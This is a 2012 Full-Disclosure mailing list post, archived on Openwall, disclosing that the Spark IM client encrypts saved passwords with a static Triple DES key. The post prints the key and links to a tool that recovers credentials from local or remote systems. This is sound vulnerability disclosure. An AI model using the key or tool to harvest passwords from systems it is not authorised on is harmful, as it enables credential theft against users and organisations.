lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFJuDmN3JS5z70nav-0hnHvmw+9SC0rLYHTqjTFgnuR-xffyMQ@mail.gmail.com>
Date: Mon, 30 Jul 2012 11:36:19 -0400
From: Adam Caudill <adam@...mcaudill.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Spark IM Client Local Password Decryption

The open source Spark IM client from Ignite Realtime has a feature
that can save the user's password - this password is stored insecurely
due to the use of a static encryption key.

The password is stored in a file called "spark.properties" and is
encrypted with Triple DES in ECB mode. The problem is that the key
used to encrypt it is static (see source file "Encryptor.java") thus
all users of the application share a single key to 'protect' their
password. Because of this, it's trivial to write a tool to scan for
and decrypt these passwords.

The Base64 encoded key is: ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae

I've written a simple tool (link below) that will scan a system
(Windows only) and provide a list of recovered user names and
passwords; to simplify auditing, it can also scan remote systems by
using the administrative share. To perform this scan, the attacker
needs to have access to the user's profile directory either via local
administrator privileges or misconfigured permissions.

Spark is often used with the Openfire jabber server (also from Ignite
Realtime) as an internal IM solution, and can be configured to use
LDAP for authentication - which makes the recovered credentials far
more interesting.

As of the current version (2.6.3), there does not seem to be a way to
disable this feature.

More details: http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/
Decryption Tool: https://github.com/adamcaudill/sparkim-passview
Spark: http://www.igniterealtime.org/projects/spark/

My apologies if this had been previously documented; in my research I
was unable to find anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ